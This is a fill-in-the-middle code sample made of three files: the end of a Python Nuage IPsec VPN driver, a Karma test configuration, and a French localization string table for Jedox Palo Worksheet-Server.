vpn_router_ids: 
self.destroy_process(process_id) def _cleanup_stale_vpn_processes(self, vpn_router_ids): process_ids = [pid for pid in self.processes if pid not in vpn_router_ids] for process_id in process_ids: self.destroy_process(process_id) def is_status_updated(self, process, previous_status): if process.updated_pending_status: return True if process.status != previous_status['status']: return True if (process.connection_status != previous_status['ipsec_site_connections']): return True def unset_updated_pending_status(self, process): process.updated_pending_status = False for connection_status in process.connection_status.values(): connection_status['updated_pending_status'] = False def copy_process_status(self, process): return { 'id': process.vpnservice['id'], 'status': process.status, 'updated_pending_status': process.updated_pending_status, 'ipsec_site_connections': copy.deepcopy(process.connection_status) } def update_downed_connections(self, process_id, new_status): """Update info to be reported, if connections just went down. If there is no longer any information for a connection, because it has been removed (e.g. due to an admin down of VPN service or IPSec connection), but there was previous status information for the connection, mark the connection as down for reporting purposes. """ if process_id in self.process_status_cache: for conn in self.process_status_cache[process_id][IPSEC_CONNS]: if conn not in new_status[IPSEC_CONNS]:<|fim▁hole|> new_status[IPSEC_CONNS][conn] = { 'status': constants.DOWN, 'updated_pending_status': True } def create_router(self, router): """Handling create router event.""" pass def destroy_router(self, process_id): pass def destroy_process(self, process_id): """Destroy process. Disable the process and remove the process manager for the processes that no longer are running vpn service. """ if process_id in self.processes: process = self.processes[process_id] process.disable() if process_id in self.processes: del self.processes[process_id] def plug_to_ovs(self, context, **kwargs): self.nuage_if_driver.plug(kwargs['network_id'], kwargs['port_id'], kwargs['device_name'], kwargs['mac'], 'alubr0', kwargs['ns_name']) self.nuage_if_driver.init_l3(kwargs['device_name'], kwargs['cidr'], kwargs['ns_name']) device = ip_lib.IPDevice(kwargs['device_name'], namespace=kwargs['ns_name']) for gateway_ip in kwargs['gw_ip']: device.route.add_gateway(gateway_ip) def unplug_from_ovs(self, context, **kwargs): self.nuage_if_driver.unplug(kwargs['device_name'], 'alubr0', kwargs['ns_name']) ip = ip_lib.IPWrapper(kwargs['ns_name']) ip.garbage_collect_namespace() # On Redhat deployments an additional directory is created named # 'ip_vti0' in the namespace which prevents the cleanup # of namespace by the neutron agent in 'ip_lib.py' which we clean. if kwargs['ns_name'] in ip.get_namespaces(): ip.netns.delete(kwargs['ns_name']) class NuageOpenSwanDriver(NuageIPsecDriver): def create_process(self, process_id, vpnservice, namespace): return ipsec.OpenSwanProcess( self.conf, process_id, vpnservice, namespace) class NuageStrongSwanDriver(NuageIPsecDriver): def create_process(self, process_id, vpnservice, namespace): return strongswan_ipsec.StrongSwanProcess( self.conf, process_id, vpnservice, namespace) class NuageStrongSwanDriverFedora(NuageIPsecDriver): def create_process(self, process_id, vpnservice, namespace): return fedora_strongswan_ipsec.FedoraStrongSwanProcess( self.conf, process_id, vpnservice, namespace)<|fim▁end|>
<|file_name|>karma.conf.js<|end_file_name|><|fim▁begin|>module.exports = function(config) { config.set({ // base path, that will be used to resolve files and exclude //basePath: '../src/', // frameworks to use frameworks: ['jasmine'], // list of files / patterns to load in the browser files: [ '../src/**/*.js', '../test/**/*.js' ], // list of files to exclude exclude: [ ], // test results reporter to use reporters: ['progress', 'coverage'], preprocessors: { '../src/**/*.js': ['coverage'] }, // configure code coverage coverageReporter: { reporters: [ {type: 'html', dir: '../coverage/'}, {type: 'lcov', dir: '../coverage/'},<|fim▁hole|> }, // web server port port: 9876, // enable / disable colors in the output (reporters and logs) colors: true, // level of logging logLevel: config.LOG_INFO, // enable / disable watching file and executing tests whenever any file changes autoWatch: true, // Start these browsers browsers: ['PhantomJS'], // If browser does not capture in given timeout [ms], kill it captureTimeout: 60000, // Continuous Integration mode // if true, it capture browsers, run tests and exit singleRun: false }); };<|fim▁end|>
{type: 'text-summary'} ]
<|file_name|>loc_fr_FR.js<|end_file_name|><|fim▁begin|>/* * \brief localization strings for fr_FR * * \file loc_fr_FR.js * * Copyright (C) 2006-2009 Jedox AG * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License (Version 2) as published * by the Free Software Foundation at http://www.gnu.org/copyleft/gpl.html. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., 59 Temple * Place, Suite 330, Boston, MA 02111-1307 USA * * You may obtain a copy of the License at * * <a href="http://www.jedox.com/license_palo_bi_suite.txt"> * http://www.jedox.com/license_palo_bi_suite.txt * </a> * * If you are developing and distributing open source applications under the * GPL License, then you are free to use Palo under the GPL License. For OEMs, * ISVs, and VARs who distribute Palo with their products, and do not license * and distribute their source code under the GPL, Jedox provides a flexible * OEM Commercial License. * * \author * Drazen Kljajic <[email protected]> * Mladen Todorovic <[email protected]> * Srdjan Vukadinovic <[email protected]> * Andrej Vrhovac <[email protected]> * Predrag Malicevic <[email protected]> * * \version * SVN: $Id: loc_fr_FR.js 4895 2011-04-27 09:35:11Z l10n-tool $ * */ Jedox.wss.i18n.L10n = 'fr_FR'; Jedox.wss.i18n.separators = [ ',', '.', ';' ]; Jedox.wss.i18n.bool = { 'true': 'VRAI', 'false': 'FAUX' }; Jedox.wss.i18n.strings = { // Menubar "Import": "Import", "Save as": "Enregistrer sous", "Save Workspace": "Volet enregistrer", "File Search": "Recherche de fichiers", "Permission": "Autorisation", "Print Area": "Zone d'impression", "Print Preview": "Aperçu avant impression", "Print": "Imprimer", "Send to": "Envoyer vers", "Form Elements": "Éléments de formulaire", "ComboBox": "Liste déroulante", "Can\'t Repeat": "Répétition impossible", "Quick Publish": "Publication rapide", "Can\'t Undo": "Impossible d'annuler", "Can\'t Redo": "Impossible de rétablir", "WSS Clipboard": "Presse-papiers", "Paste as Hyperlink": "Coller comme lien hypertexte", "Clear": "Effacer", "Delete Rows": "Supprimer les lignes", "Delete Columns": "Supprimer les colonnes", "Move or Shopy Sheet": "Déplacer ou copier la feuille", "Replace": "Remplacer", "Go To": "Atteindre", "Object": "Objet", "Normal": "Normal ", "Page Break Preview": "Aperçu des sauts de page", "Task Pane": "Panneau des tâches", "Header and Footer": "En-tête et pied de page", "Comments": "Commentaires", "Custom View": "Affichage personnalisé", "Full Screen": "Plein écran", "Zoom": "Zoom ", "Entire row": "Insertion de lignes", "Entire column": "Insertion de colonnes", "Worksheet": "Feuille", "Symbol": "Caractères spéciaux", "Page Break": "Saut de page", "Diagram": "Diagramme", "Edit Hyperlink": "Editer le lien hypertexte", "Row": "Ligne", "Row Height": "Hauteur de ligne", "Autofit Row Height": "Ajustement automatique des lignes", "Autofit Column Width": "Ajustement automatique des colonnes", "Sheet": "Feuille", "AutoFormat": "Mise en forme automatique", "Conditional Formatting": "Mise en forme conditionnelle", "Style": "Style ", "Tools": "Outils", "Spelling": "Orthographe", "Research": "Recherche", "Error Checking": "Vérification 
des erreurs", "Shared Workspace": "Espace de travail partagé", "Share Workbook": "Partager le classeur", "Track Changes": "Suivi des modifications", "Compare and Merge Workbooks": "Comparaison et fusion de classeurs", "Online Collaboration": "Collaboration en ligne", "Goal Seek": "Valeur cible", "Scenarios": "Scénarios", "Formula Auditing": "Audit de formules", "Macros": "Macros", "Add-Ins": "Macros complémentaires", "AutoCorrect Options": "Options de correction automatique", "Customize": "Personnaliser", "Options": "Options ", "Palo": "Palo ", "Paste View": "Créer une vue", "Paste SubSet": "Coller le sous-ensemble", "Paste Data Function": "Fonction d\'accès aux données", "Data Import": "Import de données", "Palo Wizard": "Assistant Palo", "WikiPalo": "WikiPalo", "About": "A propos de", "Data": "Données", "Filter": "Filtre", "Form": "Formulaire", "Subtotals": "Sous-totaux", "Validation": "Validation ", "Table": "Table ", "Text to Columns": "Convertir", "Group and Outline": "Groupe et contours", "Import External Data": "Données externes", "XML": "XML ", "Refresh Data": "Actualisation des données", "Auto-Refresh Data": "Actualisation automatique des données", "Auto-Calculate Data":"Calculation automatique des données", "New Window": "Nouvelle fenêtre", "Arrange": "Réorganiser", "Compare Side by Side with": "Comparer côte à côte avec", "Split": "Fractionner", "Freeze Panes": "Figer les volets", "Worksheet-Server Help": "Aide sur Worksheet-Server", "Jedox Online": "Jedox_Online", "Contact us": "Contactez-nous", "Check for Updates": "Rechercher les mises à jour", "Customer Feedback Options": "Options pour les commentaires utilisateurs", "About Worksheet-Server": "A propos de Worksheet-Server", "About Palo Suite":"A propos de Palo Suite", // Formatbar "Center text": "Au centre", "Align Text Right": "Aligné à droite", "Show/Hide Grid": "Afficher/masquer quadrillage", "Item Lock/Unlock": "Verrouiller les cellules", "Insert Chart": "Insérer un graphique", "Back": "Retour", "Back To": "Retour à", "Refresh / Recalculate": "Actualiser / Recalculer", "Print To PDF": "Imprimer en PDF", "Download": "Télécharger", "Download Workbook": "Télécharger le classeur", // Sheet Selector "First Sheet": "La première feuille", "Previous Sheet": "La feuille précédente", "Next Sheet": "La feuille suivante", "Last Sheet": "La dernière feuille", "Delete Worksheet": "Supprimer la feuille", "delLastWorksheet": "Un classeur doit contenir au moins une feuille.<br>Pour supprimer les feuilles sélectionnées, vous devez insérer d'abord une nouvelle feuille.", "Move Worksheet": "Déplacer la feuille", "moveLastWorksheet": "Un classeur doit contenir au moins une feuille.<br>Pour déplacer les feuilles sélectionnées, vous devez insérer d'abord une nouvelle feuille.", // Workbook "saveFileErr": "Votre fichier n'a pas pu être enregistré !", "errWBSave_nameExists": "{Name} existe déjà.<br>Souhaitez-vous remplacer le fichier ?", "errWBSave_noParent": "Nom du classeur \"{Name}\" est trop court.<br>Il doit contenir au moins 2 caractères.", "errWBSave_noParentAccess": "Nom du classeur \"{Name}\" est trop long.<br>Il ne doit pas contenir plus de 64 caractères.", "errWBSave_noAccess": "Vous ne pouvez pas enregistrer ce classeur car <br>un autre classeur \"(nom) \" est toujours ouvert.<br><br>Sélectionnez un autre nom ou fermez le même classeur.", // Import Dialog "impDlg_fieldLbl": "Fichier à importer (seulement les fichiers xlsx sont permis)", "impDlg_msgWrongType": "Dans ce champ, vous devez entrer la totalité du chemin d'accès au fichier 
xlsx !", "Upload": "Importer", "Import Error": "Erreur d'importation", "imp_err_msg": "Il n'est pas possible d'importer le fichier \"{Name}\" ", // Insert Function Dialog "Select a category": "Sélectionnez une catégorie", "Select a function": "Sélectionnez une fonction", "Functions": "Fonctions", "Insert Function": "Insérer une fonction", // Save As Dialog "newWBName": "Entrez le nouveau nom de fichier", // Errors "srvNotRespond": "Erreur fatale : le serveur ne répond pas ! \N Le client a été arrêté.", "Invalid input!": "Entrée non valide !", "Override me!": "Ignorez l'erreur !", "Error Data": "Erreur de données", "General Error": "Erreur générale", "Application Backend Error": "Backend application erreur", "Server Error": "Erreur du serveur", "This is a fatal error, re-login will be required!": "Il s'agit d'une erreur fatale. Cela nécessite un nouvel login!", // Insert/Edit Chart "End Select Range": "Fin de la plage sélectionnée", "Select Data Source": "Sélectionnez la source de données", "Input Error": "Erreur de saisie", "Unsupported Element": "Elément non supporté", "Operation Error": "Erreur d'opération", "Data Source": "Source de données", "Chart data range": "Plage de données du graphique", "Group data by": "Série en", "Use series labels": "Utiliser les noms des séries", "Label location": "Position de l'étiquette", "Use category labels": "Utiliser les noms de catégories", "Select Range": "Sélectionner une plage", "Labels": "Étiquettes", "Chart title": "Titre du graphique", "Edit Chart": "Editer le graphique", "Cols": "Cimes", "Delete Chart": "Supprimer le graphique", "chartDlg_invalidChartType": "Le type du graphique n\'est pas valide.", "chartDlg_rangeEmpty": "La plage de cellules est vide. Veuillez entrer des données ou choisir une source de données valide.", "chartDlg_deleteError": "Le graphique sélectionné ne peut pas être supprimé!", "chartDlg_EditError": "Les propriétés actuelles du graphique ne peuvent pas être récupérées", "chartDlg_unsupportedChartType": "Le type de graphique sélectionné sera bientôt disponible !", "chartDlg_genError": "La création du graphique n\'est pas possible. Veuillez vérifier les propriétés du graphique sélectionné.", "Incorect Chart Size": "La taille du graphique est incorrect", "infoChart_wrongSize": "La nouvelle taille du graphique n\'est pas bonne, il est automatiquement ajusté à la taille appropriée.", "infoChart_wrongSize2": "Certains graphiques n'ont pas la taille appropriée. 
Leur taille sera automatiquement ajustée.", "Change Chart Type": "Changer le type du graphique", "Format Chart Properties": "Formater le graphique", "Scales": "Echelles", "Zones": "Gammes", "Scale": "Echelle", "Zones options": "Options des gammes", "Points": "Aiguilles", "Points options": "Options des aiguilles", "Categories": "Catégories", "Type": "Objet", "Sort Ascending": "Tri croissant", "Sort Descending": "Tri descendant", "Group by": "Groupe par", //editChart "Column": "Histogramme", "Area": "Aires", "X Y (Scatter)": "Nuages de points", "Stock": "Bousier", "Radar": "Radar", "Meter": "Tachymètre", "Clustered Column": "Histogramme groupé", "Stacked Column": "Histogramme empilé", "100% Stacked Column": "Histogramme empilé 100%", "3-D Clustered Column": "Histogramme groupé avec effet 3D", "Stacked Column in 3-D": "Histogramme empilé avec effet 3D", "100% Stacked Column in 3-D": "Histogramme empilé 100% avec effet 3D", "Clustered Cylinder": "Histogramme groupé à formes cylindriques", "Stacked Cylinder": "Histogramme empilé à formes cylindriques", "100% Stacked Cylinder": "Histogramme empilé 100% à formes cylindriques", "Stacked Line": "Courbes empilées", "100% Stacked Line": "Courbes empilées 100%", "Rotated Line": "Courbes pivotées", "Line with Markers": "Courbes avec marques de données affichées à chaque point", "Stacked Line with Markers": "Courbes empilées avec marques de données affichées à chaque point", "100% Stacked Line with Markers": "Courbes empilées 100% avec marques de données affichées à chaque point", "Rotated Line with Markers": "Courbes pivotées avec marques de données affichées à chaque point", "3-D Line": "Courbes avec effet 3D", "Pie in 3-D": "Secteurs avec effet 3D", "Exploded Pie": "Secteurs éclatés", "Exploded Pie in 3-D": "Secteurs éclatés avec effet 3D", "Clustered Bar": "Barres groupées", "Stacked Bar": "Barres empilées", "100% Stacked Bar": "Barres empilées 100%", "Clustered Bar in 3-D": "Barres groupées avec effet 3D", "Stacked Bar in 3-D": "Barres empilées avec effet 3D", "100% Stacked Bar in 3-D": "Barres empilées 100% avec effet 3D", "Clustered Horizontal Cylinder": "Barres groupées de formes cylindriques", "Stacked Horizontal Cylinder": "Barres empilées de formes cylindriques", "100% Stacked Horizontal Cylinder": "Barres empilées 100% de formes cylindriques", "Stacked Area": "Aires empilées", "100% Stacked Area": "Aires empilées 100%", "3-D Area": "Aires avec effet 3D", "Stacked Area in 3-D": "Aires empilées avec effet 3D", "100% Stacked Area in 3-D": "Aires empilées 100% avec effet 3D", "Scatter with only Markers": "Nuage de points avec marques des données", "Scatter with Smooth Lines and Markers": "Nuage de points reliés par une courbe lissée", "Scatter with Smooth Lines": "Nuage de points avec lissage sans marquage des données", "Scatter with Straight Lines and Markers": "Nuage de points reliés par une courbe", "Scatter with Straight Lines": "Nuage de points reliés par une courbe sans marquage des données", "High-Low-Close": "Haut-bas-fermé", "Open-High-Low-Close": "Ouvert-haut-bas-fermé", "Doughnut": "Anneau", "Exploded Doughnut": "Anneau éclaté", "Bubble": "Bulles", "Bubble with a 3-D Effect": "Bulle avec effet 3D", "Radar with Markers": "Radar avec marquage des données", "Filled Radar": "Radar plein", "Odometer Full": "Cercle-Tachymètre", "Odometer Full Percentage": "Cercle-Tachymètre avec %", "Odometer Half": "Demi-Cercle-Tachymètre", "Odometer Half Percentage": "Demi-Cercle-Tachymètre avec %", "Wide Angular Meter": "Grand-Angle-Tachymètre", 
"Horizontal Line Meter": "Tachymètre horizontal", "Vertical Line Meter": "Tachymètre vertical", "Fill": "Remplir", "Border Color": "Couleur de la bordure", "No fill": "Ne pas remplir", "Solid fill": "Remplissage plein", "Automatic": "Automatique", "No line": "Pas de ligne", "Solid line": "Ligne solide", "Source Data Options": "Options de la source de données", "Chart Data Range": "Plage de données du graphique", "Group Data By": "Série en", "Columns": "Colonnes", "Rows": "Lignes", "Yes": "Oui", "No": "Non", "Font Options": "Options de police", "Title Options": "Options du titre", "Legend Options": "Options de la légende", "Horizontal Axis": "Axe des abscisses", "Horizontal axis": "Axe des abscisses", "Vertical Axis": "Axe des ordonnées", "Vertical axis": "Axe des ordonnées", "Auto": "Auto ", "Fixed": "Fixé", "Major Unit": "Grand unité", "Minor Unit": "Petit unité", "Chart Type": "Type du graphique", "Chart Area": "Zone du graphique", "Plot Area": "Zone de la figure", "Source Data": "Source de données", "Title": "Titre", "Legend": "Légende", "Axes": "Axes", "Format Chart": "Format du graphique", "Series Options":"Options des séries", "Series":"Séries", "Office":"Bureau", "Apex":"Apex", "Aspect":"Aspect", "Name":"Nom", "General":"Général", "No border":"Aucun bordure", "Select Source Data":"Source de données", //Cell Comments "Comment": "Commentaire", "Edit Comment": "Editer le commentaire", "Delete Comment": "Supprimer le commentaire", "Hide Comment": "Masquer le commentaire", "Show/Hide Comment": "Afficher/masquer le commentaire", "Insert Comment": "Insérer un commentaire", // PALO Paste View "Choose Cube": "Sélectionner le cube", "Wrap Labels": "Réaligner", "Fixed width": "Largeur fixe", "Show element selector on doubleclick": "Montrer le sélecteur en double-cliquant", "Paste at selected cell": "Coller dans la cellule sélectionnée", "Page selector": "Selecteur de page", "Column titles": "Titres en en-tête de colonne", "Row titles": "Titres de ligne", "Select Elements": "Choisir un élément", "Please wait": "Veuillez patienter", "Obtaining data!": "Transmission des données!", // Select Elements "B": " B ", "Select Branch": "Choisir une branche", "Invert Selec": "Inverser la sélection", "Paste Vertically": "Coller verticalement", "Ascending": "Ordre croissant", "Descending": "Ordre décroissant", "Clear list": "Vider la liste", "Pick list": "Liste de choix", "_msg: se_Tip": "Astuce", "Show all selection tools": "Afficher tous les outils de sélection", "insert database elements": "Insérer des éléments de la base de données ", "insert server/database (connection)": "Insérer Serveur/base de données (connexion)", "insert cube name": "Insérer le nom du cube", "insert dimension names": "Insérer les noms des dimensions", "Invert Select": "Inverser la sélection", "Paste horizontaly": "Coller horizontalement", // Paste Data Functions "Paste Data Functions": "Fonction d\'accès aux données", "Attribute Cubes": "Cube d'attributs", "Guess Arguments": "Choix automatique des paramètres", // Format Cells Dialog "Format Cells": "Format des cellules", "Number": "Nombre", "Currency": "Monétaire", "Accounting": "Comptabilité", "Date": "Date", "Time": "Heure", "Percentage": "Pourcentage", "Fraction": "Fraction", "Scientific": "Scientifique", "Special": "Spécial", "Custom": "Personnalisé", "$ US Dollar": "Dollar $ US", "€ Euro": "Euro €", "£ GB Pound": "Anglais £", "CHF Swiss Francs": "Francs Suisse CHF", "¥ Japanese Yen": "Yen japonais ¥", "YTL Turkey Liras": "Lires turques YTL", "Zł Poland Zlotych": "Zloty 
polonais Zł", "₪ Israel, New Shekels": "Nouveaux Shekels israéliens ₪", "HKD Hong Kong Dollar": "Hong Kong Dollar HKD", "KC Czech Koruny": "Couronnes tchèques KC", "CNY China Yuan": "Yen chinois CNY", "P Russian Rubles": "Roubles russes P", "_catDescr: general": "Les cellules avec un format Standard n\'ont pas de format de nombre spécifique.", "_catDescr: number": "Le format Nombre est utilisé pour l\'affichage général des nombres. Les catégories Monétaire et Comptabilité offrent des formats spéciaux pour les valeurs monétaires.", "_catDescr: currency": "Les formats Monétaire sont utilisés pour des valeurs monétaires générales. Utilisez les formats Comptabilité pour aligner les décimaux dans une colonne.", "_catDescr: accounting": "Les formats Comptabilité alignent les symboles monétaires et les décimaux dans une colonne.", "_catDescr: date": "Les formats Date affichent les numéros de date et d\'heure comme valeurs de date. À l\'exception des éléments précédés d\'un astérisque(*), l\'ordre des parties de la date ne change pas en fonction du système d\'exploitation.", "_catDescr: time": "Les formats Heures affichent les numéros de date et heure comme valeurs d\'heure. À l\'exception des éléments précédés d\'un astérisque(*), l\'ordre des parties de la date ou de l\'heure ne change pas en fonction du système d\'exploitation.", "_catDescr: percentage": "Les formats Pourcentage multiplient la valeur de la cellule par 100 et affichent le résultat avec le symbole pourcentage.", "_catDescr: special": "Les formats Spécial sont utilisés pour contrôler des valeurs de liste et de base de données.", "_catDescr: text": "Les cellules de format Texte sont traitées comme du texte même si c\'est un nombre qui se trouve dans la cellule. La cellule est affichée exactement comme elle a été entrée.", "_catDescr: custom": "Entrez le code du format de nombre, en utilisant un des codes existants comme point de départ.", "Sample": "Exemple", "Locale (location)": "Paramètres régionaux (emplacement)", "Category": "Catégorie", "Up to one digit(1/4)": "D'un chiffre(1/4)", "Up to two digits(21/35)": "De deux chiffres(21/35)", "Up to three digits(312/943)": "De trois chiffres(312/943)", "Up to halves(1/2)": "Demis(1/2)", "Up to quarters(2/4)": "Quarts(2/4)", "Up to eights(4/8)": "Huitièmes(4/8)", "Up to sixteenths(8/16)": "Seizièmes(8/16)", "Up to tenths(3/10)": "Dixièmes(3/10)", "Up to hundredths(30/100)": "Centièmes(30/100)", "Context": "Contexte", "Left-to-Right": "De gauche à droite", "Right-to-Left": "De droite à gauche", "Top": "Haut", "Justify": "Justifié", "Distributed": "Distribué", "Distributed (Indent)": "Distribué (Retrait)", "Center across section": "Centré sur plusieurs colonnes", "Left (Indent)": "Gauche (Retrait)", "Decimal places": "Décimales", "Negative numbers": "Nombres négatifs", "Use 1000 Separator (.)": "Utiliser le séparateur de milliers(.)", "Wrap Text": "Renvoyer à la ligne automatiquement", "Text alignment": "Alignement du texte", "Vertical": "Verticale", "Horizontal": "Horizontal", "Text control": "Contrôle du texte", "Merge cells": "Fusionner les cellules", "Text direction": "Orientation du texte", "Line": "Courbes", "Color": "Couleur", "Presets": "Présélections", "Border": "Bordure", "The selected border style can be applied by clicking the presets, preview diagram or the buttons above.": "Le style de bordure sélectionné peut être appliqué en cliquant sur l\'une des présélections ou les autres boutons ci-dessus.",<|fim▁hole|>"Background color": "Couleur de fond", "Pattern style": "Motifs", 
"Locked": "Verrouillée", "Hidden": "Masquée", "Normal font": "Police normale", "Strikethrough": "Barré", "Overline": "Souligné", "Effects": "Effets", "Font style": "Style ", "This is a TrueType font. The same font will be used on both your printer and your screen.": "Police TrueType, identique à l'écran et à l'impression.", "-1234,10": "-1234,10 ", "1234,10": "1234,10 ", "Protection": "Protection", "Font": "Police ", "Locking cells or hiding formulas has no effect until you protect the worksheet.": "Verrouillé ou Masqué a seulement des effets après la protection de la feuille.", "Merge": "Fusionner", "Wrap text": "Renvoyer à la ligne automatiquement", "General format cells have no formatting.": "Les cellules de format Standard n\'ont pas de format de nombre spécifique.", // Main Context Menu "Edit Micro Chart": "Editer le micrographique", // DynaRanges "Local List": "Liste locale", "Vertical Hyperblock": "DynaRange vertical", "Horizontal Hyperblock": "DynaRange horizontal", "Switch Direction": "Changer la direction", "Edit List": "Editer la liste", // hb Dialog "_tit: hb Properties": "Propriétés du DynaRange", "Standard": "Standard", "Text Format of the List": "Format texte de la liste", "List Selector": "Sélecteur de la liste", "Drill down, begin at level": "Drill down, commencer au niveau", "Indent Text": "Indenter le texte", "Fixed column width": "Largeur fixé", "Display": "Affichage", "Filling": "Remplissage", "Pattern": "Motifs", "_name: UnnamedHb": "DynaRange", "Solid": "Solide", "Dotted": "Pointillé", "Dashed": "En trait", "Direction": "Orientation", "Width": "Largeur", "auto": "auto ", "fixed": "fixé", "Set column width": "Définir la largeur des colonnes", // Unhide Windows "Unhide workbook": "Afficher le classeur", // MicroChart Dialog "Bar": "Barres", "Dots": "Points", "Doted Line": "Ligne point.", "Whisker": "Ligne mince", "Pie": "Secteurs", "0..max": "0...max", "min..max": "min..max", "user defined": "Personnalisé", "Select Cell": "Choix de cellule", "Scaling": "Échelle", "Source": "Source", "Target": "Affichage dans", "Min": "Min", "Max": "Max", "pos. values": "Valeurs positives", "neg. values": "Valeurs négatives", "win": "Profit", "tie": "Equivalent", "lose": "Perte", "first": "Première", "last": "Dernière", "min": "min", "max": "max", // Arrange Windows Dialog "Arrange Windows": "Réorganiser", "Tiled": "Mosaïque", "Cascade": "Cascade", //Open Dialog "Look in": "Rechercher dans", "My Recent Documents": "Documents récents", "My Workbook Documents": "Mes documents", "Go Up one level": "Dossier parent", "Adds New folder to the list": "Ajouter un nouveau dossier à la liste", "File name": "Nom de fichier", "Files of type": "Type de fichiers", "Work Sheet Files": "Feuilles de calcul", "All Files": "Tous les fichiers", "Save as type": "Type de fichiers", "Work Sheet Files (*.wss)": "Feuilles de calcul (*.wss)", "save_as_err_msg": "Le nom du fichier <b>\"{fileName}\"</b> n\'est pas valide. Veuillez entrer un nom valide.", "Database read error":"Erreur de lecture de base de données", "read_data_err":"Impossible de lire la base de données. Veuillez actualiser le groupe de dossiers.", "Database write error":" Erreur d'écriture dans la base de données", "write_data_err":"Impossible d'écrire dans la base. 
Veuillez actualiser le groupe de dossiers.", // Format Col/Row dialog "Row height": "Hauteur de ligne", "Column width": "Largeur de colonne", // Conditional Formatting dialog + Manage Conditional FMT "Format all cells based on their values": "Mettre en forme toutes les cellules d'après leur valeur", "Format only cells that contain": "Appliquer une mise en forme uniquement aux cellules avec contenu déterminé", "Format only top or bottom ranked values": "Appliquer une mise en forme uniquement aux valeurs classées parmi les premières ou les dernières valeurs", "Format only values that are above or below average": "Appliquer une mise en forme uniquement aux valeurs au-dessus ou en-dessous de la moyenne", "Format only unique or duplicate values": "Appliquer une mise en forme uniquement aux valeurs uniques ou aux doublons", "Use a formula to determine which cells to format": "Utiliser une formule pour déterminer pour quelles cellules le format sera appliqué", "Current Selection": "Sélection actuelle", "This Worksheet": "Cette feuille de calcul", "Edit Rule": "Modifier la règle", "Delete Rule": "Effacer la règle", "Conditional Formatting Rules Manager": "Gestionnaire des règles de mise en forme conditionnelle", "Show formatting rules for": "Affiche les règles de mise en page pour", "Rule (applied in order shown)": "Règle (appliqué de haut en bas)", "Edit Formatting Rule": "Modifier règle de mise en forme", "Applies to": "Appliqué à", "2-Color Scale": "Échelle à deux couleurs", "3-Color Scale": "Échelle à trois couleurs", "Lowest value": "Valeur inférieure", "Percent": "Pourcentage", "Formula": "Formule", "Percentile": "Centile", "Highest value": "Valeur supérieure", "above": "au-dessus", "below": "en-dessous", "equal or above": "égales ou au-dessus", "equal or below": "égales ou en-dessous", "1 std dev above": "1 écart-type au-dessus", "2 std dev above": "2 écarts-type au-dessus", "3 std dev above": "3 écarts-type au-dessus", "1 std dev below": "1 écart-type en-dessous", "2 std dev below": "2 écarts-type en-dessous", "3 std dev below": "3 écarts-type en-dessous", "duplicate": "en double", "unique": "unique", "Cell Value": "Valeur de la cellule", "Specific Text": "Texte spécifique", "Dates Occurring": "Dates se produisant", "Blanks": "Cellules vides", "No Blanks": "Aucune cellule vide", "Errors": "Erreurs", "No errors": "Aucune erreur", "between": "Comprise entre", "not between": "non comprise entre", "equal to": "égale à", "not equal to": "différente de", "greater than": "supérieure à", "less than": "inférieure à", "greater than or equal to": "supérieure ou égale à", "less than or equal to": "inférieure ou égale à", "containing": "contenant", "not containing": "ne contenant pas", "beginning with": "commençant par", "ending with": "se terminant par", "Yesterday": "Hier", "Today": "Aujourd'hui", "Tomorrow": "Demain", "In the last 7 days": "Dans les sept derniers jours", "Last week": "Semaine dernière", "This week": "Cette semaine", "Next week": "Semaine prochaine", "Last month": "Le mois dernier", "This month": "Ce mois", "Next month": "Mois prochain", "Midpoint": "Point central", "New Formatting Rule": "Nouvelle règle de mise en forme", "Select a Rule Type": "Sélectionnez un type de règles", "Edit the Rule Description": "Instructions de règle", "Stop If True": "Arrêter si vrai", "Average Value": "Valeur moyenne", "grater than": "supérieure à", "Minimum": "Minimum", "Maximum": "Maximum", "and": "et", "Format only cells with": "Appliquer une mise en forme uniquement aux cellules contenant", "% of 
the selected range": "% de la plage sélectionnée", "Format values that rank in the": "Appliquer une mise en forme aux valeurs figurant dans les", "the average for the selected range": "la moyenne de la plage sélectionnée", "Format values that are": "Appliquer une mise en forme aux valeurs qui", "values in the selected range": "Valeurs dans la plage sélectionnée", "Format all": "Appliquer une mise en forme à toutes", "Format values where this formula is true": "Appliquer une mise en forme aux valeurs pour lesquelles cette formule est vraie", // Insert Hyperlink dialog "Text to display": "Nom du lien", "E-mail address": "Adresse de messagerie", "Subject": "Objet", "Edit the new document later": "Modifier le nouveau document ultérieurement", "Edit the new document now": "Modifier le nouveau document maintenant", "Cell Reference": "Référence de cellule", "Text": "Texte", "Web Address": "Adresse Web", "Type the cell reference": "Tapez la référence de la cellule", "_cell_sheet_reference": "Cible (cellule ou feuille)", "_error: empty hl name": "Le nom de lien hypertexte (texte à afficher) est vide. Veuillez ajouter un nom.", "This field is required": "Ce champ est obligatoire", "Select a place in this document": "Veuillez sélectionnez un emplacement dans le document", "Name of new document": "Nom du nouveau document", "When to edit": "Quand modifier", "Link to": "Lien vers", "Address": "Adresse", "Existing File": "Fichier existant", "Place in This Document": "Emplacement dans ce document", "Create New Document": "Créer un document", "Web page": "Page Web", "E-mail Address": "Adresse de messagerie", "No images to display": "Pas d'image à afficher", "Screen tip": "Info bulle", "Insert Hyperlink": "Insérer un lien hypertexte", "Selection": "Sélection", "Named Rang": "Plage nommée", "Variable": "Variable", "Constant Value": "Valeur constante", "Constant List": "Liste constante", "Variable list": "Liste variable", "From Cell": "De la cellule", "Hyperlink Error": "Erreur de lien hypertexte", "_hl_missing_target_node": "Le document lié n\'existe pas. Il a peut être été déplacé ou supprimé. Veuillez en choisir un autre.", "_hl_missing_target_sheet_nr":"La feuille liée ou la plage nommée n\'existe pas. Elle a peut être été renommée ou supprimée. Veuillez en choisir une autre.", "_hl_no_selected_file": "Vous n'avez sélectionné aucun fichier. <br> Veuillez sélectionner un fichier et essayer à nouveau.", "Transfer": "Transfert", "Transfer to": "Transfert à", "Transfer To (Key)": "Transfert à", "Transfer From (Key)": "Transfert de", "Transfer From": "Transfert de", "Named Range": "Plage nommée", "Update": "Actualiser", "Picture Hyperlink": "Lien hypertexte d\'une image", //Insert Picture Dialog "Select a picture": "Sélectionner une image", "Photo": "Photo", "File Name": "Nom du fichier", "Enter the File name": "Indiquer le nom du fichier.", "Enter the File description": "Indiquer la description du fichier", 